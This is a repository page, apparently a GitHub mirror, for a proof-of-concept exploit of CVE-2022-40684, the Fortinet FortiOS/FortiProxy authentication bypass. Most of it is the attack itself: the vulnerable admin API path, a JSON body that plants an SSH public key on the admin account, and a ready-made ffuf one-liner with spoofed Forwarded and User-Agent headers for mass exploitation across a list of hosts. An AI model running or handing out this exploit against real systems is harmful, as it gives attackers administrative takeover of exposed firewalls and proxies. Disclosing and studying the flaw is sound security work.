Giters

kljunowsky / CVE-2022-40684-POC

Exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager

Home Page:https://shiftsecurityconsulting.com/

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

fortiosfortiproxyexploitauthentication-bypassbugbountypenetration-testingpocsecuritycve-2022-40684

CVE-2022-40684-POC

FortiProxy / FortiOS Authentication bypass

Mass exploitation

/api/v2/cmdb/system/admin/<username>

{"ssh-public-key1": "<your-id_rsa.pub>"}

ffuf -c -w hosts.txt -u FUZZ/api/v2/cmdb/system/admin/admin -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1
]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "kljunowsky"}' -mr "SSH" -r

Happy hunting!

Requirements

ffuf Thanks @joohoi!

Twitter

LinkedIn

About

Exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager

https://shiftsecurityconsulting.com/

fortiosfortiproxyexploitauthentication-bypassbugbountypenetration-testingpocsecuritycve-2022-40684

License:MIT License

Languages

Language:Python 100.0%